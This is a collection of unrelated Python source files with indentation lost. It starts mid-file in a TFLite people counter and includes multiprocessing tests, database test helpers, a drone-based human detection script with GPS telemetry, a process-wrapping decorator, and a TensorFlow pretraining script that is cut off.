boxes = interpreter.get_tensor(output_details[0]['index'])[0] # Bounding box coordinates of detected objects
classes = interpreter.get_tensor(output_details[1]['index'])[0] # Class index of detected objects
scores = interpreter.get_tensor(output_details[2]['index'])[0] # Confidence of detected objects
#num = interpreter.get_tensor(output_details[3]['index'])[0] # Total number of detected objects (inaccurate and not needed)
# Track number of occupants - ADDED BY COREY CLINE
num_occupants = 0
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
if ((scores[i] > min_conf_threshold) and (scores[i] <= 1.0)):
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1,(boxes[i][0] * imH)))
xmin = int(max(1,(boxes[i][1] * imW)))
ymax = int(min(imH,(boxes[i][2] * imH)))
xmax = int(min(imW,(boxes[i][3] * imW)))
cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)
# Draw label
object_name = labels[int(classes[i])] # Look up object name from "labels" array using class index
label = '%s: %d%%' % (object_name, int(scores[i]*100)) # Example: 'person: 72%'
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in
cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2) # Draw label text
# Count for People - ADDED BY COREY CLINE
if ( object_name == "person" ):
num_occupants += 1
# Draw framerate in corner of frame (Draw occupant number in corner of frame ADDED BY COREY CLINE)
cv2.putText(frame,'FPS: {0:.2f}'.format(frame_rate_calc),(30,50),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,0),2,cv2.LINE_AA)
cv2.putText(frame, 'PEOPLE: {}'.format(num_occupants),(30,90),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,0),2,cv2.LINE_AA)
if not showdisplay: ### IF DISPLAY FLAG IS NOT TRUE, PRINT DETECTION OUTPUT TO CONSOLE - JACOB HAGAN
print( "FPS: {0:.2f}".format(frame_rate_calc) + "\tPEOPLE: {}".format(num_occupants)) ### PRINT RESULTS TO CONSOLE - ADDED BY COREY CLINE
# All the results have been drawn on the frame, so it's time to display it.
if use_VideoWriter:
writer.write( frame ) ### ADDED HERE TO WRITE THE CURRENT FRAME TO THE VIDEO FILE - COREY CLINE
if showdisplay:
cv2.imshow('Object detector', frame)
# Calculate framerate
t2 = cv2.getTickCount()
time1 = (t2-t1)/freq
frame_rate_calc= 1/time1
# Check for a broker connection before publishing - COREY CLINE
if broker_ip:
time_passed = time.perf_counter() - pub_timer ### ADDED BY COREY CLINE
# Add data point to tracker - ADDED BY COREY CLINE
tracker.add_point( num_occupants )
# Check mqtt publish timer - ADDED BY COREY CLINE
if ( time_passed ) > publish_interval:
mode = tracker.get_mode()
tracker.clear_data()
TX1_client.client.loop_start()
TX1_client.publish( mqtt_topic, mode, qos = 2, retain = False )
TX1_client.client.loop_stop()
print( "PEOPLE: {}".format( mode ) )
pub_timer = time.perf_counter()
# Press 'q' to quit
if cv2.waitKey(1) == ord('q'):
break
# Clean up
cv2.destroyAllWindows()
videostream.stop()
if use_VideoWriter:
writer.release() ### ADDED HERE TO RELEASE THE VIDEO WRITER AND SAVE THE FILE - COREY CLINE
|
parellel_test_20191203.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Problem: certain sub-processes are not completing
Created on 2019-12-03 at 17:38
@author: cook
"""
import time
from multiprocessing import Process, Manager, Event
import numpy as np
import warnings
import os
import sys
import string
# ------------------------------------------------------------------------------
# constants
# ------------------------------------------------------------------------------
# max time to be in the taxing function (similar to my recipes)
# we also add +/- 25% to this time so they do not all finish at the same time
MAXTIME = 10
# a high number of cores (way higher than normal)
CORES = 20
# number of groups (we have multiple groups of parallel processes
# one group (with X cores) starts after another
# finishes (with X cores))
GROUPS = 1
# number of sub groups (within a group we have the recipe runs) these
# sub-groups are all the same recipe and divided by the number of cores
SUBGROUPS = 5
# On error what should we do
STOP_AT_ERROR = False
# ------------------------------------------------------------------------------
# This is to test a sys.exit()
TEST_SYS_EXIT = False
# this is the group num + core num to exit in [group num, core num, sub group]
TEST_SYS_NUMS = [0, 1, 'b']
# ------------------------------------------------------------------------------
# this is to test a ValueError exit (a standard python exit)
TEST_VALUE_ERROR = False
# this is the group num + core num to exit in [group num, core num, sub group]
TEST_VALUE_NUMS = [0, 1, 'b']
# ------------------------------------------------------------------------------
# This is to test a sys.exit()
TEST_OS_EXIT = True
# this is the group num + core num to exit in [group num, core num, sub group]
TEST_OS_NUMS = [0, 1, 'b']
# ------------------------------------------------------------------------------
# functions
# ------------------------------------------------------------------------------
def taxing(it, jt, kt):
"""
This simulates running a recipe
(nothing in here should change)
"""
stop_loop = False
start = time.time()
# set up x
x = it + jt
# add a random component to the time
randcomp = np.random.uniform(-MAXTIME/4, MAXTIME/4)
# create a large-ish array
y = np.random.normal(0, 1, 4096*4096).reshape((4096, 4096))
with warnings.catch_warnings(record=True) as _:
z = y ** np.log(y)
z = z ** y
# loop until time is up
while not stop_loop:
x*x
if time.time() - start > (MAXTIME + randcomp):
stop_loop = True
# --------------------------------------------------------------------------
# deal with sys exit tests
if TEST_SYS_EXIT:
if TEST_SYS_NUMS[0] == it and TEST_SYS_NUMS[1] == jt and TEST_SYS_NUMS[2] == kt:
sys.exit(0)
# deal with value error tests
if TEST_VALUE_ERROR:
        if TEST_VALUE_NUMS[0] == it and TEST_VALUE_NUMS[1] == jt and TEST_VALUE_NUMS[2] == kt:
raise ValueError('ValueError {0}-{1}-{2}'.format(it, jt, kt))
# deal with os exit tests
if TEST_OS_EXIT:
        if TEST_OS_NUMS[0] == it and TEST_OS_NUMS[1] == jt and TEST_OS_NUMS[2] == kt:
print('EXIT {0}-{1}-{2}'.format(it, jt, kt))
os._exit(0)
def myfunc(it, jt, event, rdict):
"""
This simulates the recipe controller
    This is what is run by multiprocessing.Process
this should not change (other than how we call event)
"""
letters = string.ascii_lowercase
for kit in range(SUBGROUPS):
if SUBGROUPS < len(letters):
kt = letters[kit]
else:
kt = kit
if event.is_set():
print('Skip group={0} core={1} sub={2}'.format(it, jt, kt))
return rdict
try:
# run a function that does something
print('Run: group={0} core={1} sub={2}'.format(it, jt, kt))
taxing(it, jt, kt)
print('Finish: group={0} core={1} sub={2}'.format(it, jt, kt))
# add to rdict after
rdict[(it, jt, kt)] = True
except KeyboardInterrupt:
print('KeyboardInterrupt group={0} core={1} sub={2}'
''.format(it, jt, kt))
event.set()
except Exception as e:
print('Exception group={0} core={1} sub={2}'.format(it, jt, kt))
if STOP_AT_ERROR:
event.set()
except SystemExit:
print('SystemExit group={0} core={1} sub={2}'.format(it, jt, kt))
if STOP_AT_ERROR:
event.set()
    # rdict is returned and the multiprocessing Manager handles combining
    # the dictionary between parallel processes
return rdict
# ------------------------------------------------------------------------------
# main
# ------------------------------------------------------------------------------
if __name__ == '__main__':
# event handling (using .is_set and set)
event = Event()
# shared data between processes
manager = Manager()
# just a dictionary
return_dict = manager.dict()
    # number of runs = GROUPS * CORES * SUBGROUPS
# loop around groups (number of times to run the set of parallel jobs)
for it in range(GROUPS):
jobs = []
# these are the cores (set ridiculously high)
# - these all start in parallel
for jt in range(CORES):
process = Process(target=myfunc, args=[it, jt, event, return_dict])
process.start()
jobs.append(process)
        # after starting all parallel processes we join each one in turn:
        # wait for it to finish, then move on to the next
# --> all jobs must terminate to move on to the next group
for pit, proc in enumerate(jobs):
proc.join()
# as a check
print('Number of runs expected: {0}'.format(GROUPS * CORES * SUBGROUPS))
print('Number of runs processed: {0}'.format(len(return_dict.keys())))
# ==========================================================================
#
# NOTES
#
# ==========================================================================
#
# TEST_SYS_EXIT is caught - we lose 1 entry from rdict
# processes in later groups run
# (if STOP_AT_ERROR=False)
#
# TEST_VALUE_ERROR is caught - we lose 1 entry from rdict
# processes in later groups run
# (if STOP_AT_ERROR=False)
#
# TEST_OS_EXIT is not caught - we lose 1 entry from rdict
#
#
#
|
helpers.py
|
import multiprocessing
import time
import socket
import logging
import re
from contextlib import contextmanager
from playhouse.test_utils import assert_query_count, _QueryLogHandler
from data.database import LogEntryKind, LogEntry3
class assert_action_logged(object):
"""
Specialized assertion for ensuring that a log entry of a particular kind was added under the
context of this call.
"""
def __init__(self, log_kind):
self.log_kind = log_kind
self.existing_count = 0
def _get_log_count(self):
return (
LogEntry3.select().where(LogEntry3.kind == LogEntryKind.get(name=self.log_kind)).count()
)
def __enter__(self):
self.existing_count = self._get_log_count()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_val is None:
updated_count = self._get_log_count()
error_msg = "Missing new log entry of kind %s" % self.log_kind
assert self.existing_count == (updated_count - 1), error_msg
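# Illustrative usage of assert_action_logged (a sketch; the log kind name and
# the wrapped call are hypothetical, not taken from the original tests):
#
#   with assert_action_logged("push_repo"):
#       perform_action_that_writes_a_log_entry()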
class log_queries(object):
""" Logs all queries that occur under the context. """
def __init__(self, query_filters=None):
self.filters = query_filters
def get_queries(self):
queries = [q.msg[0] for q in self._handler.queries]
if not self.filters:
return queries
filtered_queries = []
for query_filter in self.filters:
filtered_queries.extend([q for q in queries if re.match(query_filter, q)])
return filtered_queries
def __enter__(self):
logger = logging.getLogger("peewee")
self._handler = _QueryLogHandler()
logger.setLevel(logging.DEBUG)
logger.addHandler(self._handler)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
logger = logging.getLogger("peewee")
logger.removeHandler(self._handler)
class check_transitive_modifications(log_queries):
""" Checks for Peewee-generated transition deletion queries and fails if any are found.
These kinds of queries (which use subqueries) can lock massively on MySQL, so we detect
them and fail.
"""
def __init__(self):
filters = [r"^DELETE.+IN \(SELECT.+$", r"^UPDATE.+IN \(SELECT.+$"]
super(check_transitive_modifications, self).__init__(query_filters=filters)
def __exit__(self, exc_type, exc_val, exc_tb):
super(check_transitive_modifications, self).__exit__(exc_type, exc_val, exc_tb)
queries = self.get_queries()
if queries:
raise Exception("Detected transitive deletion or update in queries: %s" % queries)
_LIVESERVER_TIMEOUT = 5
@contextmanager
def liveserver_app(flask_app, port):
"""
Based on https://github.com/jarus/flask-testing/blob/master/flask_testing/utils.py.
Runs the given Flask app as a live web server locally, on the given port, starting it
when called and terminating after the yield.
Usage:
with liveserver_app(flask_app, port):
# Code that makes use of the app.
"""
shared = {}
def _can_ping_server():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(("localhost", port))
except socket.error:
success = False
else:
success = True
finally:
sock.close()
return success
def _spawn_live_server():
worker = lambda app, port: app.run(port=port, use_reloader=False)
shared["process"] = multiprocessing.Process(target=worker, args=(flask_app, port))
shared["process"].start()
start_time = time.time()
while True:
elapsed_time = time.time() - start_time
if elapsed_time > _LIVESERVER_TIMEOUT:
_terminate_live_server()
raise RuntimeError(
"Failed to start the server after %d seconds. " % _LIVESERVER_TIMEOUT
)
if _can_ping_server():
break
def _terminate_live_server():
if shared.get("process"):
shared.get("process").terminate()
shared.pop("process")
try:
_spawn_live_server()
yield
finally:
_terminate_live_server()
|
hr_RealAppNavQ.py
|
# USAGE (for real case application):
#
# python human_recog.py --mode 2 --target cpu
# python human_recog.py -m 2 -t cpu
# import the necessary packages
from imutils.video import FPS
import argparse
import imagezmq
import socket
import signal
import time
import sys
import cv2
import dlib
from multiprocessing import Process
from multiprocessing import Queue
from multiprocessing import Value
from pymavlink import mavutil
import threading
#=======================================================================
# A thread that manages the acquisition of the GPS data
def getGPS_thread(out_q, mutex, verbose):
i = 0
while mainHR_v.value:
mutex.acquire()
msg = hoverGames.recv_match()
mutex.release()
if not msg:
continue
if msg.get_type() == 'GPS_RAW_INT':
if verbose is not None:
print("\n\n*****Got message: %s*****"%msg.get_type())
print("Message: %s"%msg)
print("As dictionary: %s"%msg.to_dict())
print(" Lat. : %s"%msg.lat)
print(" Lon. : %s"%msg.lon)
print(" eph. : %s"%msg.eph)
if out_q.empty() is False:
out_q.get()
            # a queue used to exchange GPS data safely
# with the main application
out_q.put([msg.lat, msg.lon])
time.sleep(0.05)
print("[INFO] : GPS thread end.")
#=======================================================================
# a function to handle keyboard interrupt
def signal_handler_CtrlC(sig, myFrame) :
print ("")
print ("[INFO] : You pressed Ctrl + C ...")
#signal.signal(signal.SIGINT, signal.SIG_DFL)
#===============================================================
# terminate main loop & GPS data acquisition loop
mainHR_v.value = 0
#===============================================================
print ("[INFO] : Ctrl + C clean up end !!!")
#=======================================================================
# save the output data (frames where human subjects are recognized) to a file
def write_video(outputPath, writeVideo, frameWQueue, W, H):
# initialize the FourCC and video writer object
# fourcc = 4-byte code used to specify the video codec:
# DIVX, XVID, MJPG, X264, WMV1, WMV2
print("[INFO] : Configuring writing process.")
fourcc = cv2.VideoWriter_fourcc(*"MJPG")
writer = cv2.VideoWriter (outputPath, fourcc, 30.0, (W, H), True)
# loop while the write flag is set or the output
# frame queue is not empty
print("[INFO] : Starting writing process.")
while writeVideo_v.value or not frameWQueue.empty():
# check if the output frame queue is not empty
if not frameWQueue.empty():
# get the frame from the queue and write the frame
frame = frameWQueue.get()
#print("[myINFO] Right now I'm write data...")
writer.write(frame)
# release the video writer object
writer.release()
print("[INFO] : Writer process end.")
#=======================================================================
# stream the human recognition results through ZeroMQ to a server
def stream_video(myServerIP, streamVideo, frameSQueue, jpeg_quality):
    # loop while the stream flag is set or
# the output frame queue is not empty
print("[INFO] : Starting streaming process.")
# initialize the ImageSender object with
# the socket address of the server
sender = imagezmq.ImageSender(connect_to="tcp://{}:5555".format(myServerIP))
# get the host name
navq_Name = socket.gethostname()
# loop while the stream flag is set or
# the output frame queue is not empty
while streamVideo.value or not frameSQueue.empty():
# check if the output frame queue is not empty
if not frameSQueue.empty():
# get the frame from the queue and write the frame
frame = frameSQueue.get()
# flips the frame vertically
# frame = cv2.flip(frame,0)
ret_code, jpg_buffer = cv2.imencode(".jpg", frame,
[int(cv2.IMWRITE_JPEG_QUALITY), jpeg_quality])
# send the jpeg image
sender.send_jpg(navq_Name, jpg_buffer)
print("[INFO] : The streaming process end.")
#=======================================================================
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-m", "--mode", type=int, required=True,
choices=[0, 1, 2],
help="Working mode: 0 - local, 1 - streaming, 2 - full")
ap.add_argument("-t", "--target", type=str, required=True,
choices=["myriad", "cpu"],
help="target processor for object detection")
ap.add_argument("-i", "--input", type=str,
help="path to the input video file")
ap.add_argument("-o", "--output", type=str,
help="path to optional output video file")
ap.add_argument("-s", "--server-ip",
help="ip address of the server to which the client will connect")
ap.add_argument("-v", "--verbose", nargs='?',
help="provide various information to understand what is happening in the system")
args = vars(ap.parse_args())
#=======================================================================
# initialize the variables that have global effect
#0 to 100, higher is better quality, 95 is cv2 default
jpeg_quality = 65
# number of skip frames:
# * 1 detection performed with MobileNet-SSD in the first frame,
# * {skip_frames - 1} frames in which the tracking is done through
# the correlation tracker algorithm
skip_frames = 15
# the number of frames after which a custom MAVLink message will be sent
customMess_frames = 40
#=======================================================================
# check if the IP address of the server exist in the case of
# selecting the streaming mode
if args["mode"] == 1:
if args["server_ip"] is None:
print(" ")
print("[ERROR] : You selected the streaming mode, but no server IP")
print(" ")
sys.exit(0)
#=======================================================================
# initialize the list of class labels MobileNet SSD detects
CLASSES = ["background", "aeroplane", "bicycle", "bird", "boat",
"bottle", "bus", "car", "cat", "chair", "cow", "diningtable",
"dog", "horse", "motorbike", "person", "pottedplant", "sheep",
"sofa", "train", "tvmonitor"]
#=======================================================================
# load our serialized model from disk
print("[INFO] : Loading dnn MobileNet model...")
net = cv2.dnn.readNetFromCaffe("mobilenet_ssd/MobileNetSSD_deploy.prototxt",
"mobilenet_ssd/MobileNetSSD_deploy.caffemodel")
#=======================================================================
# check if the target processor is myriad, if so, then set the
# preferable target to myriad
if args["target"] == "myriad":
net.setPreferableTarget (cv2.dnn.DNN_TARGET_MYRIAD)
# otherwise, the target processor is CPU
else:
# set the preferable target processor to CPU and
# preferable backend to OpenCV
net.setPreferableTarget (cv2.dnn.DNN_TARGET_CPU)
net.setPreferableBackend (cv2.dnn.DNN_BACKEND_OPENCV)
# the DNN just processed the frame
dnnWork = 0
#=======================================================================
# MAVLink2
# create a connection to FMU
if args["mode"] == 2:
mavutil.set_dialect("video_monitor")
# create a connection to FMU
hoverGames = mavutil.mavlink_connection("/dev/ttymxc2", baud=921600) # input=False
# wait for the heartbeat message to find the system id
hoverGames.wait_heartbeat()
if args["verbose"] is not None:
print("[INFO] : Heartbeat from system (system %u component %u)"%(hoverGames.target_system, hoverGames.target_component))
#=======================================================================
# Based on the input, grab a reference to the video file or to the camera
# If no input video file is given, get data from the Google Coral camera
if not args.get("input", False):
print("[INFO] : Starting camera video stream...")
vs = cv2.VideoCapture('v4l2src ! video/x-raw,width=640,height=480 ! decodebin ! videoconvert ! appsink', cv2.CAP_GSTREAMER)
# allow the camera sensor to warmup
time.sleep(2.0)
else:
print("[INFO] : Opening input video file...")
vs = cv2.VideoCapture(args["input"])
#=======================================================================
# INIT
#=====================================================
# initialize the frame dimensions
W = None
H = None
# initialize the number of frames processed up to now
noFrames = 0
confidence = 0
myLatitude = 0
myLongitude = 0
#=======================================================================
writerProcess = None
streamProcess = None
threadGPS = None
writeVideo_v = None
streamVideo_v = None
threadGPS_v = None
mainHR_v = None
getgpsQueue = None # the GPS data frame queue
frameWQueue = None # the frame queue for avi file writing
frameSQueue = None # the frame queue for the video streaming
mainHR_v = Value('i', 1)
#=======================================================================
# begin writing the video to disk if required
if args["mode"] == 2 and threadGPS is None:
print("[INFO] : Configuring the process used to get GPS data")
# initialize a frame queue
getgpsQueue = Queue()
# intialize a mutex
mutexGPS = threading.Lock()
#=======================================================================
threadGPS = threading.Thread(target=getGPS_thread, args=(getgpsQueue, mutexGPS, args["verbose"], ))
threadGPS.start()
#=======================================================================
# signal trap to handle keyboard interrupt
signal.signal(signal.SIGINT, signal_handler_CtrlC)
#=======================================================================
print("[INFO] : Starting human detection...")
# start the frames per second throughput estimator
fps = FPS().start()
#=======================================================================
# loop over frames from the video stream
while mainHR_v.value:
# grab the next frame
if not args.get("input", False):
# read the frame from the camera
ret, frame = vs.read()
if ret == False:
print ("[Error] It was was impossible to aquire a frame!")
else:
# flips the frame vertically to compensate the camera mount
frame = cv2.flip(frame,0)
else:
frame = vs.read()
frame = frame[1]
        # If we are processing a video file and did not grab a frame,
        # we have reached the end of the video
if frame is None:
break
# convert the frame from BGR to RGB for dlib
rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# check to see if the frame dimensions are not set
if W is None or H is None:
# set the frame dimensions
(H, W) = frame.shape[:2]
#===================================================================
# begin writing the video to disk if required
if args["output"] is not None and writerProcess is None:
print("[INFO] : Configuring the writing process")
# set the value of the write flag (used here
# to start the imgs writing)
writeVideo_v = Value('i', 1)
# initialize a frame queue and start the video writer
frameWQueue = Queue()
writerProcess = Process(target=write_video,
args=(args["output"], writeVideo_v, frameWQueue, W, H))
writerProcess.start()
#===================================================================
# begin streaming the video to the server if required
if args["mode"] == 1 and streamProcess is None:
print("[INFO] : Configuring the streaming process")
# set the value of the write flag (used here
# to start the imgs streaming)
streamVideo_v = Value('i', 1)
# initialize a frame queue and start the video writer
frameSQueue = Queue()
streamProcess = Process(target=stream_video,
args=(args["server_ip"], streamVideo_v, frameSQueue, jpeg_quality))
streamProcess.start()
if noFrames % skip_frames == 0:
dnnWork = 1
# initialize a new set of detected human
trackers = []
confidences = []
if args["verbose"] is not None:
print(" ")
print("[INFO] : Starting DNN ... ")
# convert the frame to a blob
blob = cv2.dnn.blobFromImage(frame, size=(300, 300), ddepth=cv2.CV_8U)
# print("First Blob: {}".format(blob.shape))
# send the blob to the network
net.setInput(blob, scalefactor=1.0/127.5, mean=[127.5, 127.5, 127.5])
# pass the blob through the network and obtain the detections
networkOutput = net.forward()
if args["verbose"] is not None:
print("[INFO] : End DNN ... ")
for detection in networkOutput[0, 0]:
humanClass = int(detection[1])
if CLASSES[humanClass] != "person":
continue
confidence = float(detection[2])
            # require a minimum confidence to reject false positive detections
if confidence > 0.35:
confidences.append(confidence)
# work on the current frame
#====================================
left = int(detection[3]*W)
top = int(detection[4]*H)
right = int(detection[5]*W)
bottom = int(detection[6]*H)
#draw a red rectangle around detected objects
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), thickness=2)
label = "{}: {:.2f}%".format("Confidence", confidence*100)
y = top - 15 if top - 15 > 15 else top + 15
cv2.putText(frame, label, (left, y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 2)
# prepare the following skip frames
#====================================
# construct a dlib rectangle object from the bounding
# box coordinates and then start the dlib correlation
# tracker
tracker = dlib.correlation_tracker()
rect = dlib.rectangle(left, top, right, bottom)
tracker.start_track(rgb, rect)
# add the tracker to our list of trackers so we can
# utilize it during skip frames
trackers.append(tracker)
else:
dnnWork = 0
i = 0
# loop over the trackers
for tracker in trackers:
# update the tracker and grab the updated position
tracker.update(rgb)
pos = tracker.get_position()
# unpack the position object
left = int(pos.left())
top = int(pos.top())
right = int(pos.right())
bottom = int(pos.bottom())
#draw a red rectangle around detected objects
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), thickness=2)
label = "{}: {:.2f}%".format("Confidence", confidences[i]*100)
y = top - 15 if top - 15 > 15 else top + 15
cv2.putText(frame, label, (left, y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 2)
i +=1
if args["mode"] == 0:
if args["output"] is not None:
# writing the video frame to the writing queue
frameWQueue.put(frame)
else:
# show the output frame
cv2.imshow("Frame", frame)
if args["mode"] == 1:
# writing the video frame to the streaming queue
frameSQueue.put(frame)
if args["mode"] == 2:
# if customMess_frames passed then send the custom message
if noFrames % customMess_frames == 0:
if dnnWork == 1:
infoL = b'DNN'
else:
infoL = b'tracking'
if getgpsQueue.empty() is False:
lat_lon_GPS = getgpsQueue.get()
myLatitude = lat_lon_GPS[0]
myLongitude = lat_lon_GPS[1]
if args["verbose"] is not None:
print(" [Info] : Main prg. Lat. %s"%lat_lon_GPS[0])
print(" [Info] : Main prg. Lon. %s"%lat_lon_GPS[1])
#send custom mavlink message: video_monitor
mutexGPS.acquire()
hoverGames.mav.video_monitor_send(
timestamp = int(time.time() * 1e6), # time in microseconds
info = infoL,
lat = myLatitude,
lon = myLongitude,
no_people = len(confidences),
confidence = max(confidences) if len(confidences) != 0 else 0)
mutexGPS.release()
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# increment the total number of frames processed up to now
noFrames += 1
# update the FPS counter
fps.update()
# stop the timer and display FPS information
fps.stop()
print("[INFO] : Elapsed time: {:.2f}".format(fps.elapsed()))
print("[INFO] : Approx. FPS: {:.2f}".format(fps.fps()))
#=======================================================================
# release the video file pointer or video input stream
vs.release()
#=======================================================================
# terminate the video writer process
if writerProcess is not None and args["output"] is not None:
writeVideo_v.value = 0
writerProcess.join()
#=======================================================================
# terminate the video streaming process
if streamProcess is not None and args["mode"] == 1:
streamVideo_v.value = 0
streamProcess.join()
#=======================================================================
# close any open windows if they exist
if args["output"] is None and args["mode"] == 0:
print("[INFO] : Destroying the main graphical window.")
cv2.destroyAllWindows()
#=======================================================================
# terminate all loops
mainHR_v.value = 0
if threadGPS is not None:
    threadGPS.join()
#=======================================================================
net.setPreferableTarget (cv2.dnn.DNN_TARGET_CPU)
net.setPreferableBackend (cv2.dnn.DNN_BACKEND_OPENCV)
print(" ")
print("[INFO] : The human recognition program finished!!!!")
|
processify.py
|
import inspect
import os
import sys
import traceback
from functools import wraps
from multiprocessing import Process, Queue
class Sentinel:
pass
# https://gist.github.com/schlamar/2311116 & https://gist.github.com/stuaxo/889db016e51264581b50
def processify(func):
'''Decorator to run a function as a process.
Be sure that every argument and the return value
is *pickable*.
The created process is joined, so the code does not
run in parallel.
'''
def process_generator_func(q, *args, **kwargs):
result = None
error = None
        it = iter(func(*args, **kwargs))
while error is None and result != Sentinel:
try:
result = next(it)
error = None
except StopIteration:
result = Sentinel
error = None
except Exception:
ex_type, ex_value, tb = sys.exc_info()
error = ex_type, ex_value, ''.join(traceback.format_tb(tb))
result = None
q.put((result, error))
def process_func(q, *args, **kwargs):
try:
result = func(*args, **kwargs)
except Exception:
ex_type, ex_value, tb = sys.exc_info()
error = ex_type, ex_value, ''.join(traceback.format_tb(tb))
result = None
else:
error = None
q.put((result, error))
def wrap_func(*args, **kwargs):
# register original function with different name
# in sys.modules so it is pickable
process_func.__name__ = func.__name__ + 'processify_func'
setattr(sys.modules[__name__], process_func.__name__, process_func)
q = Queue()
p = Process(target=process_func, args=[q] + list(args), kwargs=kwargs)
p.start()
result, error = q.get()
p.join()
if error:
ex_type, ex_value, tb_str = error
message = '%s (in subprocess)\n%s' % (str(ex_value), tb_str)
raise ex_type(message)
return result
def wrap_generator_func(*args, **kwargs):
# register original function with different name
# in sys.modules so it is pickable
process_generator_func.__name__ = func.__name__ + 'processify_generator_func'
setattr(sys.modules[__name__], process_generator_func.__name__, process_generator_func)
q = Queue()
p = Process(target=process_generator_func, args=[q] + list(args), kwargs=kwargs)
p.start()
result = None
error = None
while error is None:
result, error = q.get()
if result == Sentinel:
break
yield result
p.join()
if error:
ex_type, ex_value, tb_str = error
message = '%s (in subprocess)\n%s' % (str(ex_value), tb_str)
raise ex_type(message)
@wraps(func)
def wrapper(*args, **kwargs):
if inspect.isgeneratorfunction(func):
return wrap_generator_func(*args, **kwargs)
else:
return wrap_func(*args, **kwargs)
return wrapper
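# ----------------------------------------------------------------------
# Minimal usage sketch (an illustrative addition, not part of the original
# gist): the decorated function executes in a child process and its return
# value travels back to the caller through the queue. Note that the
# name-registration trick above relies on the 'fork' start method, so this
# example is only expected to work on platforms where fork is the default.
@processify
def _example_square(x):
    return x * x


if __name__ == '__main__':
    # Prints 25; the multiplication itself ran in a separate process.
    print(_example_square(5))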
|
train_ug_pretrain.py
|
import tensorflow as tf
import numpy as np
import time
import datetime
import os
import network_pretrain as network_pre#pretraining for random division.
import json
from sklearn.metrics import average_precision_score
import sys
import ctypes
import threading
from kg_dataset_transe import KnowledgeGraph
export_path = "../biomedical_part1/"
export_path_g = "../biomedical_part2/"
word_vec = np.load(export_path + 'vec.npy')
KG = KnowledgeGraph(export_path)
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_float('nbatch_kg', 200,'number of knowledge-graph mini-batches per pass')
tf.app.flags.DEFINE_float('margin',1.0,'margin used in the TransE loss')
tf.app.flags.DEFINE_float('learning_rate_kg',0.05,'learning rate for kg')
tf.app.flags.DEFINE_integer('rel_total', 87,'total of relations')
tf.app.flags.DEFINE_integer('katt_flag', 13, 'type of attention')
tf.app.flags.DEFINE_string('model', 'cnn', 'neural models to encode sentences')
tf.app.flags.DEFINE_integer('max_length', 120,'maximum of number of words in one sentence')
tf.app.flags.DEFINE_integer('pos_num', 120 * 2 + 1,'number of position embedding vectors')
tf.app.flags.DEFINE_integer('num_classes', 87,'maximum of relations')
tf.app.flags.DEFINE_integer('hidden_size', 100,'hidden feature size')
#tf.app.flags.DEFINE_integer('hidden_size', 200,'hidden feature size')#for svd.
tf.app.flags.DEFINE_integer('pos_size', 5,'position embedding size')
#tf.app.flags.DEFINE_integer('max_epoch_pre', 50,'maximum of training epochs')
tf.app.flags.DEFINE_integer('max_epoch_pre', 2,'maximum of training epochs')
tf.app.flags.DEFINE_integer('batch_size',50,'entity numbers used each training time')
tf.app.flags.DEFINE_float('learning_rate',0.02,'learning rate for nn')
tf.app.flags.DEFINE_float('weight_decay',0.00001,'weight_decay')
tf.app.flags.DEFINE_float('keep_prob',0.5,'dropout rate')
tf.app.flags.DEFINE_string('model_dir', './model/','path to store model')
tf.app.flags.DEFINE_string('summary_dir','./summary','path to store summary_dir')
def MakeSummary(name, value):
"""Creates a tf.Summary proto with the given name and value."""
summary = tf.Summary()
val = summary.value.add()
val.tag = str(name)
val.simple_value = float(value)
return summary
def make_shape(array,last_dim):
output = []
for i in array:
for j in i:
output.append(j)
output = np.array(output)
if np.shape(output)[-1]==last_dim:
return output
else:
print 'Make Shape Error!'
def main(_):
word_vec = np.load(export_path + 'vec.npy')
instance_triple = np.load(export_path + 'train_instance_triple0.npy')
instance_scope = np.load(export_path + 'train_instance_scope0.npy')
instance_scope_path = np.load(export_path_g + 'train_instance_scope_kg0.npy')
instance_scope_path3 = np.load(export_path_g + 'train_instance_scope_tx0.npy')
instance_scope_path4 = np.load(export_path_g + 'train_instance_scope_ug0.npy')
train_len = np.load(export_path + 'train_len0.npy')
train_label = np.load(export_path + 'train_label0.npy')
train_word = np.load(export_path + 'train_word0.npy')
train_pos1 = np.load(export_path + 'train_pos10.npy')
train_pos2 = np.load(export_path + 'train_pos20.npy')
train_word_cross = np.load(export_path_g + 'train_word_cross0.npy')
train_pos1_cross = np.load(export_path_g + 'train_pos1_cross0.npy')
train_pos2_cross = np.load(export_path_g + 'train_pos2_cross0.npy')
train_word_cross3 = np.load(export_path_g + 'train_word_cross_tx0.npy')
train_pos1_cross3 = np.load(export_path_g + 'train_pos1_cross_tx0.npy')
train_pos2_cross3 = np.load(export_path_g + 'train_pos2_cross_tx0.npy')
train_word_cross4 = np.load(export_path_g + 'train_word_cross_ug0.npy')
train_pos1_cross4 = np.load(export_path_g + 'train_pos1_cross_ug0.npy')
train_pos2_cross4 = np.load(export_path_g + 'train_pos2_cross_ug0.npy')
train_mask = np.load(export_path + 'train_mask0.npy')
